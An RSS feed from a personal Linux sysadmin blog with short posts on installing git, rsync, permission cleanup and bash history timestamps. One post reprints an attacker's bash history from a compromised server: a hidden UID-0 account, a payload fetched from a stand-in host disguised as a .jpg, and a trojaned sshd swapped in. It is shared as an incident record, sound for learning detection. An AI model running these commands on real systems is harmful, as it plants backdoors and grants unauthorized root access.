<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	>

<channel>
	<title>tech.jerkharris.com</title>
	<atom:link href="http://tech.jerkharris.com/feed/" rel="self" type="application/rss+xml" />
	<link>http://tech.jerkharris.com</link>
	<description>now with more tasty linux morsels</description>
	<pubDate>Tue, 21 Oct 2008 08:40:21 +0000</pubDate>
	<generator>http://wordpress.org/?v=2.6.1</generator>
	<language>en</language>
			<item>
		<title>My feelings on operating systems</title>
		<link>http://tech.jerkharris.com/2008/10/21/my-feelings-on-operating-systems/</link>
		<comments>http://tech.jerkharris.com/2008/10/21/my-feelings-on-operating-systems/#comments</comments>
		<pubDate>Tue, 21 Oct 2008 08:40:21 +0000</pubDate>
		<dc:creator>jake</dc:creator>
		
		<category><![CDATA[Linux]]></category>

		<guid isPermaLink="false">http://tech.jerkharris.com/?p=33</guid>
		<description><![CDATA[Alright, there are a lot of distro zealots out there. If you&#8217;ve worked in IT for any extended amount of time, you will have known at least one or two. You know the type, the guy who tells you that &#8220;blank&#8221; is the best distro for everything. I&#8217;ll admit it, I was that guy once [...]]]></description>
			<content:encoded><![CDATA[<p>Alright, there are a lot of distro zealots out there. If you&#8217;ve worked in IT for any extended amount of time, you will have known at least one or two. You know the type, the guy who tells you that &#8220;blank&#8221; is the best distro for everything. I&#8217;ll admit it, I was that guy once in my life. If you&#8217;re an experienced linux user, chances are you&#8217;ve been that guy too. Alas, we all grow up. The best way to sum up operating systems, in my opinion, has been quote I borrowed from Robert DeNiro&#8217;s character Sam from the movie Ronin. That quote being &#8220;Its a toolbox&#8221; in response to the question &#8220;What do you favor?&#8221;. Of course, he was speaking of guns. However, I am not a mercenary. I&#8217;m a system admin. The phrase still holds true for my profession as it probably does for many others. However, in my experience, I feel this is especially fitting to operating systems. At a job interview for my first real IT job, I was asked, &#8220;What is your favorite operating system.&#8221; Of course, I told the truth. I have no favorite. I use what works best for the job at hand. I felt this was a very good answer. However, the interviewer pressed the point, wanting to know what I favored. Its a shame I did not muster the afore mentioned quote. I finally just told him I preferred Linux, as the place I was interviewing for was a Linux shop and I knew that was the answer they were looking for. So, there you have it my $.02.</p>
]]></content:encoded>
			<wfw:commentRss>http://tech.jerkharris.com/2008/10/21/my-feelings-on-operating-systems/feed/</wfw:commentRss>
		</item>
		<item>
		<title>Installing git on CentOS 5</title>
		<link>http://tech.jerkharris.com/2008/10/02/installing-git-on-centos-5/</link>
		<comments>http://tech.jerkharris.com/2008/10/02/installing-git-on-centos-5/#comments</comments>
		<pubDate>Fri, 03 Oct 2008 01:47:59 +0000</pubDate>
		<dc:creator>jake</dc:creator>
		
		<category><![CDATA[Linux]]></category>

		<guid isPermaLink="false">http://tech.jerkharris.com/?p=28</guid>
		<description><![CDATA[The install process for this is fairly simple. These packages come from the EPEL repositories. EPEL stands for Extra Packages for Enterprise Linux. It is maintained by the Fedora project. So, a big thanks to them!
Down to business!
wget http://download.fedora.redhat.com/pub/epel/5/i386/perl-Git-1.5.5.1-2.el5.i386.rpm
wget http://download.fedora.redhat.com/pub/epel/5/i386/perl-Error-0.17010-1.el5.noarch.rpm
wget http://download.fedora.redhat.com/pub/epel/5/i386/git-1.5.5.1-2.el5.i386.rpm
rpm -ivh perl-Git-1.5.5.1-2.el5.i386.rpm perl-Error-0.17010-1.el5.noarch.rpm git-1.5.5.1-2.el5.i386.rpm
That&#8217;s all there is to it!
]]></description>
			<content:encoded><![CDATA[<p>The install process for this is fairly simple. These packages come from the <a title="EPEL repositories" href="https://fedoraproject.org/wiki/EPEL" target="_blank">EPEL repositories</a>. EPEL stands for Extra Packages for Enterprise Linux. It is maintained by the Fedora project. So, a big thanks to them!</p>
<p>Down to business!</p>
<div class="php" style="font-family: monospace;color: #000066; border: 1px solid orange; margin: 5px; padding: 5px; background-color: #ffffff;">wget http:<span style="color: #808080; font-style: italic;">//download.fedora.redhat.com/pub/epel/5/i386/perl-Git-1.5.5.1-2.el5.i386.rpm</span><br />
wget http:<span style="color: #808080; font-style: italic;">//download.fedora.redhat.com/pub/epel/5/i386/perl-Error-0.17010-1.el5.noarch.rpm</span><br />
wget http:<span style="color: #808080; font-style: italic;">//download.fedora.redhat.com/pub/epel/5/i386/git-1.5.5.1-2.el5.i386.rpm</span><br />
rpm -ivh perl-Git<span style="color: #cc66cc;">-1.5</span><span style="color: #cc66cc;">.5</span><span style="color: #cc66cc;">.1</span><span style="color: #cc66cc;">-2</span>.el5.i386.rpm perl-Error<span style="color: #cc66cc;">-0.17010</span><span style="color: #cc66cc;">-1</span>.el5.noarch.rpm git<span style="color: #cc66cc;">-1.5</span><span style="color: #cc66cc;">.5</span><span style="color: #cc66cc;">.1</span><span style="color: #cc66cc;">-2</span>.el5.i386.rpm</div>
<p>That&#8217;s all there is to it!</p>
]]></content:encoded>
			<wfw:commentRss>http://tech.jerkharris.com/2008/10/02/installing-git-on-centos-5/feed/</wfw:commentRss>
		</item>
		<item>
		<title>A new project</title>
		<link>http://tech.jerkharris.com/2007/12/21/no-posts-lately/</link>
		<comments>http://tech.jerkharris.com/2007/12/21/no-posts-lately/#comments</comments>
		<pubDate>Sat, 22 Dec 2007 03:58:32 +0000</pubDate>
		<dc:creator>jake</dc:creator>
		
		<category><![CDATA[Linux]]></category>

		<guid isPermaLink="false">http://tech.jerkharris.com/2007/12/21/no-posts-lately/</guid>
		<description><![CDATA[  Hey everyone. Sorry I haven&#8217;t been posting much lately. I&#8217;ve been working on another project that has been taking most of my time. My girlfriend has been in town the past few weeks visiting as well. So most of my time outside of work is already spoken for.
The project I&#8217;ve been working on [...]]]></description>
			<content:encoded><![CDATA[<p>  Hey everyone. Sorry I haven&#8217;t been posting much lately. I&#8217;ve been working on another project that has been taking most of my time. My girlfriend has been in town the past few weeks visiting as well. So most of my time outside of work is already spoken for.</p>
<p>The project I&#8217;ve been working on is a web based front end to my router box written in PHP.  First, the router isn&#8217;t your standard store bought model. It&#8217;s a little beefier to say the least. The router is actually a Pentium III 650MHz w/256 MB of RAM running Fedora Core 6. I built it a little over a year and a half ago to learn more about routing using Linux. But more specifically, I wanted to learn more about iptables. It has served well as a learning device. But, I really can&#8217;t say that I understand everything as much as I&#8217;d like to.</p>
<p>So, the other night I got bored and decided to try some packet sniffing on my network to see what was going on while I was at work. What I didn&#8217;t really realize was that the sniffer I chose to use (ettercap) disabled ip forwarding. Not a good thing to disable on your router. I had to call my girlfriend and have her hook a monitor and keyboard up to the machine, then find the script, then run it. Not an easy task for someone whose passion is painting and not linux. I have to say she did a good job for being totally clueless as to what she was doing. After that mutual headache, I decided I needed an easier way run the script than logging in locally.</p>
<p>I decided the best way to do this would be to create a web based interface. I figured using PHP would be preferable. This is something I had never done before. And to be honest, I was fairly intimidated. The extent of my PHP knowledge consisted of using passthru to run whoami to see what user php scripts were being executed by. Well, it was actually a lot easier than I had thought it would be. I&#8217;ve put about 8 hours into the project thus far and I have implemented an inbound and outbound IP blocker, DHCP host adder, and Squid ACL adder. Information about the system is also displayed, such as the kernel, disk and memory usage, and bandwidth graphs on both LAN and WAN interfaces. I&#8217;ve included a screen shot of the main page after the jump for anyone interested. Its not very pretty, but its at least functional. Anybody have any good names for this concoction?<span id="more-24"></span></p>
<p><a href="http://jerkharris.com/blog/router.png" target="_blank"></a></p>
<div><a href="http://jerkharris.com/blog/router.png" target="_blank"><img src="http://jerkharris.com/blog/router.png" border="1" height="75%" width="75%" /></a></div>
]]></content:encoded>
			<wfw:commentRss>http://tech.jerkharris.com/2007/12/21/no-posts-lately/feed/</wfw:commentRss>
		</item>
		<item>
		<title>rsync starter</title>
		<link>http://tech.jerkharris.com/2007/12/06/rsync-starter/</link>
		<comments>http://tech.jerkharris.com/2007/12/06/rsync-starter/#comments</comments>
		<pubDate>Fri, 07 Dec 2007 02:50:55 +0000</pubDate>
		<dc:creator>jake</dc:creator>
		
		<category><![CDATA[Linux]]></category>

		<guid isPermaLink="false">http://jerkharris.com/tech/rsync-starter/</guid>
		<description><![CDATA[A fantastic utility for copying files in a unix based environment is rsync. It will let you copy from one location to another or to another computer if need be. You can do a lot of things with rsync. But lets start out with the basics.
 Copying locally:
rysnc is like most other copy utilities. You [...]]]></description>
			<content:encoded><![CDATA[<p>A fantastic utility for copying files in a unix based environment is rsync. It will let you copy from one location to another or to another computer if need be. You can do a lot of things with rsync. But lets start out with the basics.</p>
<p><strong> Copying locally:</strong></p>
<p>rysnc is like most other copy utilities. You must specify a source and a destination. Here are some examples.</p>
<div class="php" style="font-family: monospace;color: #000066; border: 1px solid orange; margin: 5px; padding: 5px; background-color: #ffffff;">rsync -av /home /backup</div>
<p>This will copy the entire /home directory to /backup. Notice there is no trailing slash on the source of /home. This tells rsync to transfer /home and all the contents within. If you included a trailing slash rsync would transfer all of the files within the home directory, but not home itself. This is an important point to keep in mind.</p>
<p>Now.. Say you need to restore a user&#8217;s public_html  contents. The syntax would be as follows.</p>
<div class="php" style="font-family: monospace;color: #000066; border: 1px solid orange; margin: 5px; padding: 5px; background-color: #ffffff;">rsync -av /backup/home/user1/public_html/ /home/user1/public_html</div>
<p>Okay now.. Getting the hang of it?  Now for some really cool stuff!</p>
<p><strong>Transferring to and from remote machines:</strong></p>
<p>So, recently I got a new laptop and I wanted to copy my music collection over to it so I could have more to listen to at work. I used rsync over SSH to get this done. Now, generally you probably don&#8217;t want to have rsync open to the public if you want to maintain some privacy and security. That is why it is wise to use rsync over ssh. This sounds much more complicated than it actually is.</p>
<div class="php" style="font-family: monospace;color: #000066; border: 1px solid orange; margin: 5px; padding: 5px; background-color: #ffffff;">rsync -ave ssh harrisj@nas:/home/share/music/ harrisj@laptop:~/Music/</div>
<p>The only thing that you need to do is to add the -e flag to execute a command. So in this case, we use -e ssh to execute rsync over ssh. The way I have illustrated above will allow you to transfer from one machine to another without being logged into either of them. This is in my opinion one of the coolest things about rsync.</p>
<p><strong>Flags:</strong></p>
<p>Some of my favorite flags.</p>
<blockquote><p>-a, &#8211;archive               archive mode; same as -rlptgoD (no -H)<br />
-v, &#8211;verbose               increase verbosity<br />
-e, &#8211;rsh=COMMAND           specify the remote shell to use<br />
-q, &#8211;quiet                 suppress non-error messages</p>
<p>&#8211;progress              show progress during transfer<br />
&#8211;exclude=PATTERN       exclude files matching PATTERN</p></blockquote>
<p>Hopefully this is a good starter for all of you out there that aren&#8217;t that well versed with rsync. I find this utility being used more than twice in my every day computing life. Please post any questions in the comments.</p>
]]></content:encoded>
			<wfw:commentRss>http://tech.jerkharris.com/2007/12/06/rsync-starter/feed/</wfw:commentRss>
		</item>
		<item>
		<title>Delete empty directories</title>
		<link>http://tech.jerkharris.com/2007/11/21/delete-empty-directories/</link>
		<comments>http://tech.jerkharris.com/2007/11/21/delete-empty-directories/#comments</comments>
		<pubDate>Wed, 21 Nov 2007 07:22:39 +0000</pubDate>
		<dc:creator>jake</dc:creator>
		
		<category><![CDATA[Linux]]></category>

		<guid isPermaLink="false">http://jerkharris.com/blog/?p=22</guid>
		<description><![CDATA[Over the years, my music collection has moved from one drive to another to another and so on. Unfortunately, I&#8217;ve lost some data through my own poor copy methods. This has left me with a lot of empty directories. Cleaning these out when you have more than 200 directories to pick through can be rather [...]]]></description>
			<content:encoded><![CDATA[<p>Over the years, my music collection has moved from one drive to another to another and so on. Unfortunately, I&#8217;ve lost some data through my own poor copy methods. This has left me with a lot of empty directories. Cleaning these out when you have more than 200 directories to pick through can be rather tedious.  Thank goodness for find! Use the following to clean out your empty directories.</p>
<div class="php" style="font-family: monospace;color: #000066; border: 1px solid orange; margin: 5px; padding: 5px; background-color: #ffffff;">find ~/<a href="http://www.php.net/dir"><span style="color: #000066;">dir</span></a> -<a href="http://www.php.net/empty"><span style="color: #000066;">empty</span></a> -type d -<a href="http://www.php.net/exec"><span style="color: #000066;">exec</span></a> <a href="http://www.php.net/rmdir"><span style="color: #000066;">rmdir</span></a> <span style="color: #ff0000;">&#8216;{}&#8217;</span> <span style="color: #ff0000;">&#8216;;&#8217;</span></div>
]]></content:encoded>
			<wfw:commentRss>http://tech.jerkharris.com/2007/11/21/delete-empty-directories/feed/</wfw:commentRss>
		</item>
		<item>
		<title>Finding and removing files with weak permissions</title>
		<link>http://tech.jerkharris.com/2007/11/17/finding-and-removing-files-with-weak-permissions/</link>
		<comments>http://tech.jerkharris.com/2007/11/17/finding-and-removing-files-with-weak-permissions/#comments</comments>
		<pubDate>Sat, 17 Nov 2007 22:18:53 +0000</pubDate>
		<dc:creator>jake</dc:creator>
		
		<category><![CDATA[Bash]]></category>

		<category><![CDATA[Linux]]></category>

		<guid isPermaLink="false">http://jerkharris.com/blog/?p=21</guid>
		<description><![CDATA[This is a nice little script that I use to clean up files and directories with poor permissions. Its great to use in preparation before installing mod_suPHP/PHP suexec.
#!/bin/bash
# Make sure all files are owned by the correct user. Get rid of file owned by nobody
for i in $(ls /home&#124; cut -f1 -d/); do chown -R [...]]]></description>
			<content:encoded><![CDATA[<p>This is a nice little script that I use to clean up files and directories with poor permissions. Its great to use in preparation before installing mod_suPHP/PHP suexec.</p>
<div class="php" style="font-family: monospace;color: #000066; border: 1px solid orange; margin: 5px; padding: 5px; background-color: #ffffff;"><span style="color: #808080; font-style: italic;">#!/bin/bash</span></div>
<p># Make sure all files are owned by the correct user. Get rid of file owned by nobody<br />
for i in $(ls /home| cut -f1 -d/); do chown -R $i:$i /home/$i/public_html/*; done</p>
<p># Find all files that are 777 and change them to 644<br />
for i in $(find /home/*/public_html -perm 777 -type f); do chmod 644 $i; done</p>
<p># Find all directories that are 777 and change them to 755<br />
for i in $(find /home/*/public_html -perm 777 -type d); do chmod 755 $i; done</p>
]]></content:encoded>
			<wfw:commentRss>http://tech.jerkharris.com/2007/11/17/finding-and-removing-files-with-weak-permissions/feed/</wfw:commentRss>
		</item>
		<item>
		<title>Adding Timestamps to your bash history</title>
		<link>http://tech.jerkharris.com/2007/11/06/adding-timestamps-to-your-bash-history/</link>
		<comments>http://tech.jerkharris.com/2007/11/06/adding-timestamps-to-your-bash-history/#comments</comments>
		<pubDate>Tue, 06 Nov 2007 05:55:56 +0000</pubDate>
		<dc:creator>jake</dc:creator>
		
		<category><![CDATA[Bash]]></category>

		<category><![CDATA[Linux]]></category>

		<guid isPermaLink="false">http://jerkharris.com/blog/?p=20</guid>
		<description><![CDATA[This is easily done by adding two lines to your .bashrc file.
HISTTIMEFORMAT=&#34;(%m/%d/%y) %T &#34;
export HISTTIMEFORMAT
Now your bash history will have the date and time that each command was run.
545 &#160;&#40;11/05/07&#41; 08:46:14 ssh root@192.168.0.1
]]></description>
			<content:encoded><![CDATA[<p>This is easily done by adding two lines to your .bashrc file.</p>
<div class="php" style="font-family: monospace;color: #000066; border: 1px solid orange; margin: 5px; padding: 5px; background-color: #ffffff;">HISTTIMEFORMAT=<span style="color: #ff0000;">&quot;(%m/%d/%y) %T &quot;</span><br />
export HISTTIMEFORMAT</div>
<p>Now your bash history will have the date and time that each command was run.</p>
<div class="php" style="font-family: monospace;color: #000066; border: 1px solid orange; margin: 5px; padding: 5px; background-color: #ffffff;"><span style="color: #cc66cc;">545</span> &nbsp;<span style="color: #66cc66;">&#40;</span><span style="color: #cc66cc;">11</span>/<span style="color: #cc66cc;">05</span>/<span style="color: #cc66cc;">07</span><span style="color: #66cc66;">&#41;</span> <span style="color: #cc66cc;">08</span>:<span style="color: #cc66cc;">46</span>:<span style="color: #cc66cc;">14</span> ssh root@<span style="color: #cc66cc;">192.168</span><span style="color: #cc66cc;">.0</span><span style="color: #cc66cc;">.1</span></div>
]]></content:encoded>
			<wfw:commentRss>http://tech.jerkharris.com/2007/11/06/adding-timestamps-to-your-bash-history/feed/</wfw:commentRss>
		</item>
		<item>
		<title>history of a compromised server</title>
		<link>http://tech.jerkharris.com/2007/10/30/history-of-a-compromised-server/</link>
		<comments>http://tech.jerkharris.com/2007/10/30/history-of-a-compromised-server/#comments</comments>
		<pubDate>Wed, 31 Oct 2007 03:41:16 +0000</pubDate>
		<dc:creator>jake</dc:creator>
		
		<category><![CDATA[Linux]]></category>

		<guid isPermaLink="false">http://jerkharris.com/blog/?p=19</guid>
		<description><![CDATA[Here you have the bash_history excerpt from a compromised server.  The attacker was lazy enough to not even cover his/her tracks. My night just got a whole lot more exciting due to this though.

311 &#160;/usr/sbin/useradd -o -u 0 oracle
312 &#160;passwd oracle
313 &#160;/sbin/ifconfig &#124;grep inet
314 &#160;cd /home/oracle
315 &#160;ls
316 &#160;wget domain.tld/user/sniff.jpg
317 &#160;tar xzvf sniff.jpg
318 &#160;cd ssh
319 [...]]]></description>
			<content:encoded><![CDATA[<p>Here you have the bash_history excerpt from a compromised server.  The attacker was lazy enough to not even cover his/her tracks. My night just got a whole lot more exciting due to this though.</p>
<p><span class="mediumtext">
<div class="php" style="font-family: monospace;color: #000066; border: 1px solid orange; margin: 5px; padding: 5px; background-color: #ffffff;"><span style="color: #cc66cc;">311</span> &nbsp;/usr/sbin/useradd -o -u <span style="color: #cc66cc;">0</span> oracle<br />
<span style="color: #cc66cc;">312</span> &nbsp;passwd oracle<br />
<span style="color: #cc66cc;">313</span> &nbsp;/sbin/ifconfig |grep inet<br />
<span style="color: #cc66cc;">314</span> &nbsp;cd /home/oracle<br />
<span style="color: #cc66cc;">315</span> &nbsp;ls<br />
<span style="color: #cc66cc;">316</span> &nbsp;wget domain.tld/user/sniff.jpg<br />
<span style="color: #cc66cc;">317</span> &nbsp;tar xzvf sniff.jpg<br />
<span style="color: #cc66cc;">318</span> &nbsp;cd ssh<br />
<span style="color: #cc66cc;">319</span> &nbsp;ls<br />
<span style="color: #cc66cc;">320</span> &nbsp;telnet localhost <span style="color: #cc66cc;">22</span><br />
<span style="color: #cc66cc;">321</span> &nbsp;nano apps/ssh/ssh2version.h<br />
<span style="color: #cc66cc;">322</span> &nbsp;SSH<span style="color: #cc66cc;">-2.0</span>-OpenSSH_3.9p1<br />
<span style="color: #cc66cc;">323</span> &nbsp;./configure &#8211;without-x ; make ; make install<br />
<span style="color: #cc66cc;">324</span> &nbsp;rm -rf /usr/sbin/sshd ; cp /usr/local/sbin/sshd /usr/sbin<br />
<span style="color: #cc66cc;">325</span> &nbsp;kill <span style="color: #cc66cc;">-9</span> `cat /<span style="color: #000000; font-weight: bold;">var</span>/run/sshd.pid` ; /usr/sbin/sshd<br />
<span style="color: #cc66cc;">326</span> &nbsp;cd ..<br />
<span style="color: #cc66cc;">327</span> &nbsp;ls<br />
<span style="color: #cc66cc;">328</span> &nbsp;rm -rf sniff.jpg &nbsp;ssh</div>
<p></span></p>
<p>Caught by rkhunter.</p>
]]></content:encoded>
			<wfw:commentRss>http://tech.jerkharris.com/2007/10/30/history-of-a-compromised-server/feed/</wfw:commentRss>
		</item>
		<item>
		<title>New Plugin, Better formatting!</title>
		<link>http://tech.jerkharris.com/2007/07/30/new-plugin-better-formatting/</link>
		<comments>http://tech.jerkharris.com/2007/07/30/new-plugin-better-formatting/#comments</comments>
		<pubDate>Mon, 30 Jul 2007 22:12:46 +0000</pubDate>
		<dc:creator>jake</dc:creator>
		
		<category><![CDATA[Linux]]></category>

		<guid isPermaLink="false">http://jerkharris.com/blog/?p=13</guid>
		<description><![CDATA[A big thanks to my good man Shelby over at fauxzen.com for suggesting the SemGeshi CodeFix plugin. It has made my site look way better!
]]></description>
			<content:encoded><![CDATA[<p>A big thanks to my good man Shelby over at <a href="http://fauxzen.com" title="fauxzen.com" target="_blank">fauxzen.com</a> for suggesting the <a href="http://wordpress.mu/110.html" title="SemGeshi CodeFix Plugin" target="_blank">SemGeshi CodeFix plugin</a>. It has made my site look way better!</p>
]]></content:encoded>
			<wfw:commentRss>http://tech.jerkharris.com/2007/07/30/new-plugin-better-formatting/feed/</wfw:commentRss>
		</item>
		<item>
		<title>Custom Error Pages</title>
		<link>http://tech.jerkharris.com/2007/07/20/custom-error-pages/</link>
		<comments>http://tech.jerkharris.com/2007/07/20/custom-error-pages/#comments</comments>
		<pubDate>Sat, 21 Jul 2007 02:48:47 +0000</pubDate>
		<dc:creator>jake</dc:creator>
		
		<category><![CDATA[Linux]]></category>

		<guid isPermaLink="false">http://jerkharris.com/blog/?p=9</guid>
		<description><![CDATA[I got bored at work the other day and decided to whip up some custom error pages. You can see them for yourself.

http://jerkharris.com/400.shtml
http://jerkharris.com/401.shtml
http://jerkharris.com/404.shtml
http://jerkharris.com/500.shtml

]]></description>
			<content:encoded><![CDATA[<p>I got bored at work the other day and decided to whip up some custom error pages. You can see them for yourself.</p>
<ul>
<li><a href="http://jerkharris.com/400.shtml" title="http://jerkharris.com/400.shtml" target="_blank">http://jerkharris.com/400.shtml</a></li>
<li><a href="http://jerkharris.com/401.shtml" title="http://jerkharris.com/401.shtml" target="_blank">http://jerkharris.com/401.shtml</a></li>
<li><a href="http://jerkharris.com/404.shtml" title="http://jerkharris.com/404.shtml" target="_blank">http://jerkharris.com/404.shtml</a></li>
<li><a href="http://jerkharris.com/500.shtml" title="http://jerkharris.com/500.shtml" target="_blank">http://jerkharris.com/500.shtml</a></li>
</ul>
]]></content:encoded>
			<wfw:commentRss>http://tech.jerkharris.com/2007/07/20/custom-error-pages/feed/</wfw:commentRss>
		</item>
	</channel>
</rss>
